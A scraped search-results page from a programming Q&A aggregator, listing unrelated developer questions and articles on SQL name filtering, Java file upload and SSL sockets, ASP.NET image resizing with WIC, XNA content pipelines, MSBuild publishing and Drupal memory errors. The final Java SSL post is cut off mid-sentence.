Search Results

Search found 21392 results on 856 pages for 'audio output'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 172/856 | < Previous Page | 168 169 170 171 172 173 174 175 176 177 178 179  | Next Page >

  • Filter rows on the basis of "First Name" + "Last Name" in SQL

    - by Raghav Khunger
    Hi, I have a user table in my database which contains two columns FirstName and LastName. Now in my front end there is a textbox to filter out the users from this table. Let's suppose I am taking that input from the front end in the form of a input parameter "@SEARCHKEYWORD". I have created a sample below: DECLARE @Test TABLE ([ID] INT IDENTITY, [FNAME] NVARCHAR(100), [LNAME] NVARCHAR(100) ) INSERT INTO @Test( FNAME, LNAME ) SELECT 'John','Resig' UNION ALL SELECT 'Dave','Ward' UNION ALL SELECT 'Peter','Smith' UNION ALL SELECT 'Dave','Smith' UNION ALL SELECT 'Girija','Acharya' UNION ALL SELECT 'Devendra', 'Gujel' UNION ALL SELECT 'Arjit', 'Gupta' DECLARE @SEARCHKEYWORD NVARCHAR(100) SELECT * FROM @Test WHERE FNAME +' '+ LNAME LIKE @SEARCHKEYWORD i.e. so far I have thought of this query to filter out the rows but it is not giving the desired results: SELECT * FROM @Test WHERE FNAME +' '+ LNAME LIKE @SEARCHKEYWORD Here are the desired outputs which I needed for the inputs mentioned below: --WHEN @SEARCHKEYWORD='John Resig' --Desired OUTPUT: the row which contains 'John','Resig' --WHEN @SEARCHKEYWORD='Ac' --Desired OUTPUT: the row which contains 'Girija','Acharya' --WHEN @SEARCHKEYWORD='Smith' --Desired OUTPUT: the row which contains 'Peter','Smith' and 'Dave','Smith' --WHEN @SEARCHKEYWORD='g' --Desired OUTPUT: the row which contains 'Devendra', 'Gujel' and 'Arjit', 'Gupta' --WHEN @SEARCHKEYWORD='Smith' --Desired OUTPUT: the row which contains 'Peter','Smith' and 'Dave','Smith'

    Read the article

  • Live Support Webinar for Oracle Primavera Customers

    - by karl.prutzer
    Hi all, Our Customer Support team is hosting another Live Support Webinar for Oracle Primavera customers scheduled for May 6, 2010 at 11am Eastern Time. The webinar covers the following topics. Best Practices when submitting an SR My Oracle Support Overview Support Resources - lifetime support policy, My Oracle Support Speed training resources, etc. Both the conference key for the web conference and the audio passcode for the call is... Primavera Audio Conference Details Toll Free dial in number = 1.877.808.5067 International Toll dial in number = 1.706.902.0289 Web conference link https://strtc.oracle.com/imtapp/app/sch_mtg_details.uix?mID=6761278

    Read the article

  • Does writing data to server using Java URL class require response from server?

    - by gigadot
    I am trying to upload files using Java URL class and I have found a previous question on stack-overflow which explains very well about the details, so I try to follow it. And below is my code adopted from the sniplet given in the answer. My problem is that if I don't make a call to one of connection.getResponseCode() or connection.getInputStream() or connection.getResponseMessage() or anything which is related to reponse from the server, the request will never be sent to server. Why do I need to do this? Or is there any way to write the data without getting the response? P.S. I have developed a server-side uploading servlet which accepts multipart/form-data and save it to files using FileUpload. It is stable and definitely working without any problem so this is not where my problem is generated. import java.io.Closeable; import java.io.File; import java.io.FileInputStream; import java.io.IOException; import java.io.OutputStream; import java.io.PrintWriter; import java.net.HttpURLConnection; import java.net.URL; import org.apache.commons.io.IOUtils; public class URLUploader { public static void closeQuietly(Closeable... objs) { for (Closeable closeable : objs) { IOUtils.closeQuietly(closeable); } } public static void main(String[] args) throws IOException { File textFile = new File("D:\\file.zip"); String boundary = Long.toHexString(System.currentTimeMillis()); // Just generate some unique random value. HttpURLConnection connection = (HttpURLConnection) new URL("http://localhost:8080/upslet/upload").openConnection(); connection.setDoOutput(true); connection.setRequestProperty("Content-Type", "multipart/form-data; boundary=" + boundary); OutputStream output = output = connection.getOutputStream(); PrintWriter writer = writer = new PrintWriter(output, true); // Send text file. writer.println("--" + boundary); writer.println("Content-Disposition: form-data; name=\"file1\"; filename=\"" + textFile.getName() + "\""); writer.println("Content-Type: application/octet-stream"); FileInputStream fin = new FileInputStream(textFile); writer.println(); IOUtils.copy(fin, output); writer.println(); // End of multipart/form-data. writer.println("--" + boundary + "--"); output.flush(); closeQuietly(fin, writer, output); // Above request will never be sent if .getInputStream() or .getResponseCode() or .getResponseMessage() does not get called. connection.getResponseCode(); } }

    Read the article

  • Detect a white square in a black and white image

    - by gcc
    I saw that question i one web site (cite name like that programm.) then i tried to solve but icannot (not my and myfriend homework ) how can i approach to that one (in program.net no solution there is ) Read black & white image data from standard input, and detect a white square in the image. Output the coordinates of the upper left corner of the square, and the width of the square. In the preliminary work, you can print the output and terminate your program after you detect your first square. If you can't find any square on the image, you will print the string: "NO DETECTION". Input (which represents a 2 by 2 square in the center of a 5 by 4 image): 2 2 5 4 0 0 0 0 0 0 0 255 255 0 0 0 255 255 0 0 0 0 0 0 Output: 3 2 2 Input (more comprehensible format of the image, with the same output): 2 6 4 000 000 000 000 000 000 000 000 255 255 255 000 000 000 000 255 255 000 000 000 000 000 000 000 Output: no detection Input can be: 000 255 255 000 000 000 000 255 255 000 000 000 000 000 000 000 000 000 000 000 000 000 000 000 000 000 255 255 255 000 000 000 255 255 255 000 000 000 255 255 255 000 000 000 000 000 000 000 If there are two squares detected, we should use the biggest one

    Read the article

  • The fastest way to resize images from ASP.NET. And it’s (more) supported-ish.

    - by Bertrand Le Roy
    I’ve shown before how to resize images using GDI, which is fairly common but is explicitly unsupported because we know of very real problems that this can cause. Still, many sites still use that method because those problems are fairly rare, and because most people assume it’s the only way to get the job done. Plus, it works in medium trust. More recently, I’ve shown how you can use WPF APIs to do the same thing and get JPEG thumbnails, only 2.5 times faster than GDI (even now that GDI really ultimately uses WIC to read and write images). The boost in performance is great, but it comes at a cost, that you may or may not care about: it won’t work in medium trust. It’s also just as unsupported as the GDI option. What I want to show today is how to use the Windows Imaging Components from ASP.NET APIs directly, without going through WPF. The approach has the great advantage that it’s been tested and proven to scale very well. The WIC team tells me you should be able to call support and get answers if you hit problems. Caveats exist though. First, this is using interop, so until a signed wrapper sits in the GAC, it will require full trust. Second, the APIs have a very strong smell of native code and are definitely not .NET-friendly. And finally, the most serious problem is that older versions of Windows don’t offer MTA support for image decoding. MTA support is only available on Windows 7, Vista and Windows Server 2008. But on 2003 and XP, you’ll only get STA support. that means that the thread safety that we so badly need for server applications is not guaranteed on those operating systems. To make it work, you’d have to spin specialized threads yourself and manage the lifetime of your objects, which is outside the scope of this article. We’ll assume that we’re fine with al this and that we’re running on 7 or 2008 under full trust. Be warned that the code that follows is not simple or very readable. This is definitely not the easiest way to resize an image in .NET. Wrapping native APIs such as WIC in a managed wrapper is never easy, but fortunately we won’t have to: the WIC team already did it for us and released the results under MS-PL. The InteropServices folder, which contains the wrappers we need, is in the WicCop project but I’ve also included it in the sample that you can download from the link at the end of the article. In order to produce a thumbnail, we first have to obtain a decoding frame object that WIC can use. Like with WPF, that object will contain the command to decode a frame from the source image but won’t do the actual decoding until necessary. Getting the frame is done by reading the image bytes through a special WIC stream that you can obtain from a factory object that we’re going to reuse for lots of other tasks: var photo = File.ReadAllBytes(photoPath); var factory = (IWICComponentFactory)new WICImagingFactory(); var inputStream = factory.CreateStream(); inputStream.InitializeFromMemory(photo, (uint)photo.Length); var decoder = factory.CreateDecoderFromStream( inputStream, null, WICDecodeOptions.WICDecodeMetadataCacheOnLoad); var frame = decoder.GetFrame(0); We can read the dimensions of the frame using the following (somewhat ugly) code: uint width, height; frame.GetSize(out width, out height); This enables us to compute the dimensions of the thumbnail, as I’ve shown in previous articles. We now need to prepare the output stream for the thumbnail. WIC requires a special kind of stream, IStream (not implemented by System.IO.Stream) and doesn’t directlyunderstand .NET streams. It does provide a number of implementations but not exactly what we need here. We need to output to memory because we’ll want to persist the same bytes to the response stream and to a local file for caching. The memory-bound version of IStream requires a fixed-length buffer but we won’t know the length of the buffer before we resize. To solve that problem, I’ve built a derived class from MemoryStream that also implements IStream. The implementation is not very complicated, it just delegates the IStream methods to the base class, but it involves some native pointer manipulation. Once we have a stream, we need to build the encoder for the output format, which could be anything that WIC supports. For web thumbnails, our only reasonable options are PNG and JPEG. I explored PNG because it’s a lossless format, and because WIC does support PNG compression. That compression is not very efficient though and JPEG offers good quality with much smaller file sizes. On the web, it matters. I found the best PNG compression option (adaptive) to give files that are about twice as big as 100%-quality JPEG (an absurd setting), 4.5 times bigger than 95%-quality JPEG and 7 times larger than 85%-quality JPEG, which is more than acceptable quality. As a consequence, we’ll use JPEG. The JPEG encoder can be prepared as follows: var encoder = factory.CreateEncoder( Consts.GUID_ContainerFormatJpeg, null); encoder.Initialize(outputStream, WICBitmapEncoderCacheOption.WICBitmapEncoderNoCache); The next operation is to create the output frame: IWICBitmapFrameEncode outputFrame; var arg = new IPropertyBag2[1]; encoder.CreateNewFrame(out outputFrame, arg); Notice that we are passing in a property bag. This is where we’re going to specify our only parameter for encoding, the JPEG quality setting: var propBag = arg[0]; var propertyBagOption = new PROPBAG2[1]; propertyBagOption[0].pstrName = "ImageQuality"; propBag.Write(1, propertyBagOption, new object[] { 0.85F }); outputFrame.Initialize(propBag); We can then set the resolution for the thumbnail to be 96, something we weren’t able to do with WPF and had to hack around: outputFrame.SetResolution(96, 96); Next, we set the size of the output frame and create a scaler from the input frame and the computed dimensions of the target thumbnail: outputFrame.SetSize(thumbWidth, thumbHeight); var scaler = factory.CreateBitmapScaler(); scaler.Initialize(frame, thumbWidth, thumbHeight, WICBitmapInterpolationMode.WICBitmapInterpolationModeFant); The scaler is using the Fant method, which I think is the best looking one even if it seems a little softer than cubic (zoomed here to better show the defects): Cubic Fant Linear Nearest neighbor We can write the source image to the output frame through the scaler: outputFrame.WriteSource(scaler, new WICRect { X = 0, Y = 0, Width = (int)thumbWidth, Height = (int)thumbHeight }); And finally we commit the pipeline that we built and get the byte array for the thumbnail out of our memory stream: outputFrame.Commit(); encoder.Commit(); var outputArray = outputStream.ToArray(); outputStream.Close(); That byte array can then be sent to the output stream and to the cache file. Once we’ve gone through this exercise, it’s only natural to wonder whether it was worth the trouble. I ran this method, as well as GDI and WPF resizing over thirty twelve megapixel images for JPEG qualities between 70% and 100% and measured the file size and time to resize. Here are the results: Size of resized images   Time to resize thirty 12 megapixel images Not much to see on the size graph: sizes from WPF and WIC are equivalent, which is hardly surprising as WPF calls into WIC. There is just an anomaly for 75% for WPF that I noted in my previous article and that disappears when using WIC directly. But overall, using WPF or WIC over GDI represents a slight win in file size. The time to resize is more interesting. WPF and WIC get similar times although WIC seems to always be a little faster. Not surprising considering WPF is using WIC. The margin of error on this results is probably fairly close to the time difference. As we already knew, the time to resize does not depend on the quality level, only the size does. This means that the only decision you have to make here is size versus visual quality. This third approach to server-side image resizing on ASP.NET seems to converge on the fastest possible one. We have marginally better performance than WPF, but with some additional peace of mind that this approach is sanctioned for server-side usage by the Windows Imaging team. It still doesn’t work in medium trust. That is a problem and shows the way for future server-friendly managed wrappers around WIC. The sample code for this article can be downloaded from: http://weblogs.asp.net/blogs/bleroy/Samples/WicResize.zip The benchmark code can be found here (you’ll need to add your own images to the Images directory and then add those to the project, with content and copy if newer in the properties of the files in the solution explorer): http://weblogs.asp.net/blogs/bleroy/Samples/WicWpfGdiImageResizeBenchmark.zip WIC tools can be downloaded from: http://code.msdn.microsoft.com/wictools To conclude, here are some of the resized thumbnails at 85% fant:

    Read the article

  • Custom Content Pipeline with Automatic Serialization Load Error

    - by Direweasel
    I'm running into this error: Error loading "desert". Cannot find type TiledLib.MapContent, TiledLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null. at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.InstantiateTypeReader(String readerTypeName, ContentReader contentReader, ContentTypeReader& reader) at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.GetTypeReader(String readerTypeName, ContentReader contentReader, List1& newTypeReaders) at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.ReadTypeManifest(Int32 typeCount, ContentReader contentReader) at Microsoft.Xna.Framework.Content.ContentReader.ReadHeader() at Microsoft.Xna.Framework.Content.ContentReader.ReadAsset[T]() at Microsoft.Xna.Framework.Content.ContentManager.ReadAsset[T](String assetName, Action1 recordDisposableObject) at Microsoft.Xna.Framework.Content.ContentManager.Load[T](String assetName) at TiledTest.Game1.LoadContent() in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Game1.cs:line 51 at Microsoft.Xna.Framework.Game.Initialize() at TiledTest.Game1.Initialize() in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Game1.cs:line 39 at Microsoft.Xna.Framework.Game.RunGame(Boolean useBlockingRun) at Microsoft.Xna.Framework.Game.Run() at TiledTest.Program.Main(String[] args) in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Program.cs:line 15 When trying to run the game. This is a basic demo to try and utilize a separate project library called TiledLib. I have four projects overall: TiledLib (C# Class Library) TiledTest (Windows Game) TiledTestContent (Content) TMX CP Ext (Content Pipeline Extension Library) TiledLib contains MapContent which is throwing the error, however I believe this may just be a generic error with a deeper root problem. EMX CP Ext contains one file: MapProcessor.cs using System; using System.Collections.Generic; using System.Linq; using Microsoft.Xna.Framework; using Microsoft.Xna.Framework.Graphics; using Microsoft.Xna.Framework.Content.Pipeline; using Microsoft.Xna.Framework.Content.Pipeline.Graphics; using Microsoft.Xna.Framework.Content.Pipeline.Processors; using Microsoft.Xna.Framework.Content; using TiledLib; namespace TMX_CP_Ext { // Each tile has a texture, source rect, and sprite effects. [ContentSerializerRuntimeType("TiledTest.Tile, TiledTest")] public class DemoMapTileContent { public ExternalReference<Texture2DContent> Texture; public Rectangle SourceRectangle; public SpriteEffects SpriteEffects; } // For each layer, we store the size of the layer and the tiles. [ContentSerializerRuntimeType("TiledTest.Layer, TiledTest")] public class DemoMapLayerContent { public int Width; public int Height; public DemoMapTileContent[] Tiles; } // For the map itself, we just store the size, tile size, and a list of layers. [ContentSerializerRuntimeType("TiledTest.Map, TiledTest")] public class DemoMapContent { public int TileWidth; public int TileHeight; public List<DemoMapLayerContent> Layers = new List<DemoMapLayerContent>(); } [ContentProcessor(DisplayName = "TMX Processor - TiledLib")] public class MapProcessor : ContentProcessor<MapContent, DemoMapContent> { public override DemoMapContent Process(MapContent input, ContentProcessorContext context) { // build the textures TiledHelpers.BuildTileSetTextures(input, context); // generate source rectangles TiledHelpers.GenerateTileSourceRectangles(input); // now build our output, first by just copying over some data DemoMapContent output = new DemoMapContent { TileWidth = input.TileWidth, TileHeight = input.TileHeight }; // iterate all the layers of the input foreach (LayerContent layer in input.Layers) { // we only care about tile layers in our demo TileLayerContent tlc = layer as TileLayerContent; if (tlc != null) { // create the new layer DemoMapLayerContent outLayer = new DemoMapLayerContent { Width = tlc.Width, Height = tlc.Height, }; // we need to build up our tile list now outLayer.Tiles = new DemoMapTileContent[tlc.Data.Length]; for (int i = 0; i < tlc.Data.Length; i++) { // get the ID of the tile uint tileID = tlc.Data[i]; // use that to get the actual index as well as the SpriteEffects int tileIndex; SpriteEffects spriteEffects; TiledHelpers.DecodeTileID(tileID, out tileIndex, out spriteEffects); // figure out which tile set has this tile index in it and grab // the texture reference and source rectangle. ExternalReference<Texture2DContent> textureContent = null; Rectangle sourceRect = new Rectangle(); // iterate all the tile sets foreach (var tileSet in input.TileSets) { // if our tile index is in this set if (tileIndex - tileSet.FirstId < tileSet.Tiles.Count) { // store the texture content and source rectangle textureContent = tileSet.Texture; sourceRect = tileSet.Tiles[(int)(tileIndex - tileSet.FirstId)].Source; // and break out of the foreach loop break; } } // now insert the tile into our output outLayer.Tiles[i] = new DemoMapTileContent { Texture = textureContent, SourceRectangle = sourceRect, SpriteEffects = spriteEffects }; } // add the layer to our output output.Layers.Add(outLayer); } } // return the output object. because we have ContentSerializerRuntimeType attributes on our // objects, we don't need a ContentTypeWriter and can just use the automatic serialization. return output; } } } TiledLib contains a large amount of files including MapContent.cs using System; using System.Collections.Generic; using System.Globalization; using System.Xml; using Microsoft.Xna.Framework.Content.Pipeline; namespace TiledLib { public enum Orientation : byte { Orthogonal, Isometric, } public class MapContent { public string Filename; public string Directory; public string Version = string.Empty; public Orientation Orientation; public int Width; public int Height; public int TileWidth; public int TileHeight; public PropertyCollection Properties = new PropertyCollection(); public List<TileSetContent> TileSets = new List<TileSetContent>(); public List<LayerContent> Layers = new List<LayerContent>(); public MapContent(XmlDocument document, ContentImporterContext context) { XmlNode mapNode = document["map"]; Version = mapNode.Attributes["version"].Value; Orientation = (Orientation)Enum.Parse(typeof(Orientation), mapNode.Attributes["orientation"].Value, true); Width = int.Parse(mapNode.Attributes["width"].Value, CultureInfo.InvariantCulture); Height = int.Parse(mapNode.Attributes["height"].Value, CultureInfo.InvariantCulture); TileWidth = int.Parse(mapNode.Attributes["tilewidth"].Value, CultureInfo.InvariantCulture); TileHeight = int.Parse(mapNode.Attributes["tileheight"].Value, CultureInfo.InvariantCulture); XmlNode propertiesNode = document.SelectSingleNode("map/properties"); if (propertiesNode != null) { Properties = new PropertyCollection(propertiesNode, context); } foreach (XmlNode tileSet in document.SelectNodes("map/tileset")) { if (tileSet.Attributes["source"] != null) { TileSets.Add(new ExternalTileSetContent(tileSet, context)); } else { TileSets.Add(new TileSetContent(tileSet, context)); } } foreach (XmlNode layerNode in document.SelectNodes("map/layer|map/objectgroup")) { LayerContent layerContent; if (layerNode.Name == "layer") { layerContent = new TileLayerContent(layerNode, context); } else if (layerNode.Name == "objectgroup") { layerContent = new MapObjectLayerContent(layerNode, context); } else { throw new Exception("Unknown layer name: " + layerNode.Name); } // Layer names need to be unique for our lookup system, but Tiled // doesn't require unique names. string layerName = layerContent.Name; int duplicateCount = 2; // if a layer already has the same name... if (Layers.Find(l => l.Name == layerName) != null) { // figure out a layer name that does work do { layerName = string.Format("{0}{1}", layerContent.Name, duplicateCount); duplicateCount++; } while (Layers.Find(l => l.Name == layerName) != null); // log a warning for the user to see context.Logger.LogWarning(string.Empty, new ContentIdentity(), "Renaming layer \"{1}\" to \"{2}\" to make a unique name.", layerContent.Type, layerContent.Name, layerName); // save that name layerContent.Name = layerName; } Layers.Add(layerContent); } } } } I'm lost as to why this is failing. Thoughts? -- EDIT -- After playing with it a bit, I would think it has something to do with referencing the projects. I'm already referencing the TiledLib within my main windows project (TiledTest). However, this doesn't seem to make a difference. I can place the dll generated from the TiledLib project into the debug folder of TiledTest, and this causes it to generate a different error: Error loading "desert". Cannot find ContentTypeReader for Microsoft.Xna.Framework.Content.Pipeline.ExternalReference`1[Microsoft.Xna.Framework.Content.Pipeline.Graphics.Texture2DContent]. at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.GetTypeReader(Type targetType, ContentReader contentReader) at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.GetTypeReader(Type targetType) at Microsoft.Xna.Framework.Content.ReflectiveReaderMemberHelper..ctor(ContentTypeReaderManager manager, FieldInfo fieldInfo, PropertyInfo propertyInfo, Type memberType, Boolean canWrite) at Microsoft.Xna.Framework.Content.ReflectiveReaderMemberHelper.TryCreate(ContentTypeReaderManager manager, Type declaringType, FieldInfo fieldInfo) at Microsoft.Xna.Framework.Content.ReflectiveReader1.Initialize(ContentTypeReaderManager manager) at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.ReadTypeManifest(Int32 typeCount, ContentReader contentReader) at Microsoft.Xna.Framework.Content.ContentReader.ReadHeader() at Microsoft.Xna.Framework.Content.ContentReader.ReadAsset[T]() at Microsoft.Xna.Framework.Content.ContentManager.ReadAsset[T](String assetName, Action1 recordDisposableObject) at Microsoft.Xna.Framework.Content.ContentManager.Load[T](String assetName) at TiledTest.Game1.LoadContent() in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Game1.cs:line 51 at Microsoft.Xna.Framework.Game.Initialize() at TiledTest.Game1.Initialize() in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Game1.cs:line 39 at Microsoft.Xna.Framework.Game.RunGame(Boolean useBlockingRun) at Microsoft.Xna.Framework.Game.Run() at TiledTest.Program.Main(String[] args) in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Program.cs:line 15 This is all incredibly frustrating as the demo doesn't appear to have any special linking properties. The TiledLib I am utilizing is from Nick Gravelyn, and can be found here: https://bitbucket.org/nickgravelyn/tiledlib. The demo it comes with works fine, and yet in recreating I always run into this error.

    Read the article

  • String search and write into file in jython

    - by kdev
    hi Everyone , i wish to write a program that can read a file and if a particular str_to_find is found in a bigger string say AACATGCCACCTGAATTGGATGGAATTCATGCGGGACACGCGGATTACACCTATGAGCAGAAATACGGCCTGCGCGATTACCGTGGCGGTGGACGTTCTTCCGCGCGTGAAACCGCGATGCGCGTAGCGGCAGGGGCGATCGCCAAGAAATACCTGGCGGAAAAGTTCGGCATCGAAATCCGCGGCTGCCTGACCCAGATGGGCGACATTCCGCTGGAGATTAAAGACTGGCGTCAGGTTGAGCTTAATCCGTTTTC then write that line and the above line of it into the file and keep repeating it for all the match found. Please suggest i have written the program for printing that particular search line but i dont know how to write the above line. Thanks everyone for your help. import re import string file=open('C:/Users/Administrator/Desktop/input.txt','r') output=open('C:/Users/Administrator/Desktop/output.txt','w') count_record=file.readline() str_to_find='AACCATGC' while count_record: if string.find(list,str_to_find) ==0: output.write(count_record) file.close() output.close()

    Read the article

  • _CopyWebApplication with web.config transformations

    - by Jeremy
    I am trying to have my web application automatically Publish when a Release build is performed. I'm doing this using the _CopyWebApplication target. I added the following to my .csproj file: <!-- Automatically Publish in Release build. --> <Import Project="$(MSBuildExtensionsPath)\Microsoft\VisualStudio\v10.0\WebApplications\Microsoft.WebApplication.targets" /> <Target Name="AfterBuild"> <RemoveDir Directories="$(ProjectDir)..\Output\MyWeb" ContinueOnError="true" /> <MSBuild Projects="MyWeb.csproj" Properties="Configuration=Release;WebProjectOutputDir=$(ProjectDir)..\Output\MyWeb;OutDir=$(ProjectDir)bin\" Targets="ResolveReferences;_CopyWebApplication" /> </Target> This works but with one issue. The difference between this output, and the output generated when using the Publish menu item in Visual Studio, is that the Web.Release.config transformation is not applied to the Web.config file when using the MSBuild method. Instead, Web.config, Web.Release.config, and Web.Debug.config are all copied. Any ideas are appreciated.

    Read the article

  • PHP throws 'Allowed memory exhausted' errors while migrating data in Drupal.

    - by Stan
    I'm trying to setup a tiny sandbox on a local machine to play around with Drupal. I created a few CCK types; in order to create a few nodes I wrote the following script: chdir('C:\..\drupal'); require_once '.\includes\bootstrap.inc'; drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL); module_load_include('inc', 'node', 'node.pages'); $node = array('type' => 'my_type'); $link = mysql_connect(..); mysql_select_db('my_db'); $query_bldg = ' SELECT stuff FROM table LIMIT 10 '; $result = mysql_query($query_bldg); while ($row = mysql_fetch_object($result)) { $form_state = array(); $form_state['values']['name'] = 'admin'; $form_state['values']['status'] = 1; $form_state['values']['op'] = t('Save'); $form_state['values']['title'] = $row->val_a; $form_state['values']['my_field'][0]['value'] = $row->val_b; ## About another dozen or so of similar assignments... drupal_execute('node_form', $form_state, (object)$node); } Here are a few relevant lines from php_errors.log: [12-Jun-2010 05:02:47] PHP Notice: Undefined index: REMOTE_ADDR in C:\..\drupal\includes\bootstrap.inc on line 1299 [12-Jun-2010 05:02:47] PHP Notice: Undefined index: REMOTE_ADDR in C:\..\drupal\includes\bootstrap.inc on line 1299 [12-Jun-2010 05:02:47] PHP Warning: session_start(): Cannot send session cookie - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 1143 [12-Jun-2010 05:02:47] PHP Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 1143 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 709 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 710 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 711 [12-Jun-2010 05:02:47] PHP Warning: Cannot modify header information - headers already sent by (output started at C:\..\drupal\includes\bootstrap.inc:1299) in C:\..\drupal\includes\bootstrap.inc on line 712 [12-Jun-2010 05:02:47] PHP Notice: Undefined index: REMOTE_ADDR in C:\..\drupal\includes\bootstrap.inc on line 1299 [12-Jun-2010 05:02:48] PHP Fatal error: Allowed memory size of 239075328 bytes exhau sted (tried to allocate 261904 bytes) in C:\..\drupal\includes\form.inc on line 488 [12-Jun-2010 05:03:22] PHP Fatal error: Allowed memory size of 239075328 bytes exhausted (tried to allocate 261904 bytes) in C:\..\drupal\includes\form.inc on line 488 [12-Jun-2010 05:04:34] PHP Fatal error: Allowed memory size of 262144 bytes exhausted (tried to allocate 261904 bytes) in Unknown on line 0 At this point any action php takes results in the last error shown above. I tried increasing the value of memory_limit in php.ini before the final Fatal error which obviously didn't help. How can the error be eliminated? Am I on a correct path to migrating data into Drupal or should the cck tables be operated on directly? Windows XP PHP 5.3.2 VC6 Apache 2.2

    Read the article

  • Java, server client TCP communication ends with RST

    - by Senne
    I'm trying to figure out if this is normal. Because without errors, a connection should be terminated by: FIN -> <- ACK <- FIN ACK -> I get this at the end of a TCP connection (over SSL, but i also get it with non-encrypted): From To 1494 server client TCP search-agent > 59185 [PSH, ACK] Seq=25974 Ack=49460 Win=63784 Len=50 1495 client server TCP 59185 > search-agent [ACK] Seq=49460 Ack=26024 Win=63565 Len=0 1496 client server TCP 59185 > search-agent [PSH, ACK] Seq=49460 Ack=26024 Win=63565 Len=23 1497 client server TCP 59185 > search-agent [FIN, ACK] Seq=49483 Ack=26024 Win=63565 Len=0 1498 server client TCP search-agent > 59185 [PSH, ACK] Seq=26024 Ack=49484 Win=63784 Len=23 1499 client server TCP 59185 > search-agent [RST, ACK] Seq=49484 Ack=26047 Win=0 Len=0 The client exits normally and reaches socket.close, shouldn't then the connection be shut down normally, without a reset? I can't find anything about the TCP streams of java on google... Here is my code: Server: package Security; import java.io.*; import java.net.*; import javax.net.ServerSocketFactory; import javax.net.ssl.*; import java.util.*; public class SSLDemoServer { private static ServerSocket serverSocket; private static final int PORT = 1234; public static void main(String[] args) throws IOException { int received = 0; String returned; ObjectInputStream input = null; PrintWriter output = null; Socket client; System.setProperty("javax.net.ssl.keyStore", "key.keystore"); System.setProperty("javax.net.ssl.keyStorePassword", "vwpolo"); System.setProperty("javax.net.ssl.trustStore", "key.keystore"); System.setProperty("javax.net.ssl.trustStorePassword", "vwpolo"); try { System.out.println("Trying to set up server ..."); ServerSocketFactory factory = SSLServerSocketFactory.getDefault(); serverSocket = factory.createServerSocket(PORT); System.out.println("Server started!\n"); } catch (IOException ioEx) { System.out.println("Unable to set up port!"); ioEx.printStackTrace(); System.exit(1); } while(true) { client = serverSocket.accept(); System.out.println("Client trying to connect..."); try { System.out.println("Trying to create inputstream..."); input = new ObjectInputStream(client.getInputStream()); System.out.println("Trying to create outputstream..."); output = new PrintWriter(client.getOutputStream(), true); System.out.println("Client successfully connected!"); while( true ) { received = input.readInt(); returned = Integer.toHexString(received); System.out.print(" " + received); output.println(returned.toUpperCase()); } } catch(SSLException sslEx) { System.out.println("Connection failed! (non-SSL connection?)\n"); client.close(); continue; } catch(EOFException eofEx) { System.out.println("\nEnd of client data.\n"); } catch(IOException ioEx) { System.out.println("I/O problem! (correct inputstream?)"); } try { input.close(); output.close(); } catch (Exception e) { } client.close(); System.out.println("Client closed.\n"); } } } Client: package Security; import java.io.*; import java.net.*; import javax.net.ssl.*; import java.util.*; public class SSLDemoClient { private static InetAddress host; private static final int PORT = 1234; public static void main(String[] args) { System.setProperty("javax.net.ssl.keyStore", "key.keystore"); System.setProperty("javax.net.ssl.keyStorePassword", "vwpolo"); System.setProperty("javax.net.ssl.trustStore", "key.keystore"); System.setProperty("javax.net.ssl.trustStorePassword", "vwpolo"); System.out.println("\nCreating SSL socket ..."); SSLSocket socket = null; try { host = InetAddress.getByName("192.168.56.101"); SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault(); socket = (SSLSocket) factory.createSocket(host, PORT); socket.startHandshake(); } catch(UnknownHostException uhEx) { System.out.println("\nHost ID not found!\n"); System.exit(1); } catch(SSLException sslEx) { System.out.println("\nHandshaking unsuccessful ..."); System.exit(1); } catch (IOException e) { e.printStackTrace(); } System.out.println("\nHandshaking succeeded ...\n"); SSLClientThread client = new SSLClientThread(socket); SSLReceiverThread receiver = new SSLReceiverThread(socket); client.start(); receiver.start(); try { client.join(); receiver.join(); System.out.println("Trying to close..."); socket.close(); } catch(InterruptedException iEx) { iEx.printStackTrace(); } catch(IOException ioEx) { ioEx.printStackTrace(); } System.out.println("\nClient finished."); } } class SSLClientThread extends Thread { private SSLSocket socket; public SSLClientThread(SSLSocket s) { socket = s; } public void run() { try { ObjectOutputStream output = new ObjectOutputStream(socket.getOutputStream()); for( int i = 1; i < 1025; i++) { output.writeInt(i); sleep(10); output.flush(); } output.flush(); sleep(1000); output.close(); } catch(IOException ioEx) { System.out.println("Socket closed or unable to open socket."); } catch(InterruptedException iEx) { iEx.printStackTrace(); } } } class SSLReceiverThread extends Thread { private SSLSocket socket; public SSLReceiverThread(SSLSocket s) { socket = s; } public void run() { String response = null; BufferedReader input = null; try { input = new BufferedReader( new InputStreamReader(socket.getInputStream())); try { response = input.readLine(); while(!response.equals(null)) { System.out.print(response + " "); response = input.readLine(); } } catch(Exception e) { System.out.println("\nEnd of server 